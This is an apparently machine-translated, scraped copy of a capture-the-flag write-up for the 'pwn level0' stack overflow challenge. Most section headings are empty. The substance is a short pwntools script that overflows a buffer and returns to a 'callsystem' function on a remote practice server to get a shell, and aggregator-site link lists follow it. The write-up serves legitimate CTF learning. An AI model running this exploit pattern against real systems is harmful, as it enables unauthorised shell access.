Offense and defense in the world -pwn-level0

Others 2020-04-03 19:49:09 views: null

Topic analysis

After downloading the file first using checksec check the file protection mechanism

File name is too long, it changes a bit

A 64-bit program is found, the use of pseudo-code view ida

We noticed a special function name callsystem

OK idea, direct stack overflow

collect message

Determining an offset

/ Bin / sh address

method 1

Method 2

Scripting

from pwn import *

p = remote('111.198.29.45',32366)
#p = process("./pwn001")
system = 0x400596
payload = "A"*0x80+"b"*8+p64(system)
p.sendlineafter("Hello, World",payload)
p.interactive()

Local test

Drone test


Guess you like

Origin www.cnblogs.com/anweilx/p/12628337.html
Recommended
The “35-year-old curse” of Chinese coders
蘭雅 CorelDRAW 插件 2024.5.1 国际劳动节版,免费下载
Ranking
Methods and Practices of Manufacturing Data Quality Improvement
Serial port upgrade program for efficient transmission of large firmware
Use KITTI to run LIOSAM and complete the EVO evaluation
Calling methods on string literals (Java)
ActiveMQ and Spring integration (4)
You have to know the HTTPS! ! !
PAT whether Structures and Algorithms 7-4 with a binary search tree (40 rows streamlined structure)
el-upload brings request background
UVA - 1204 Fun Game-like pressure dp
2019-12-28
Daily
More
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)
2024-04-27(29)
2024-04-26(22)
2024-04-25(32)

Code World

© 2018 codetd.com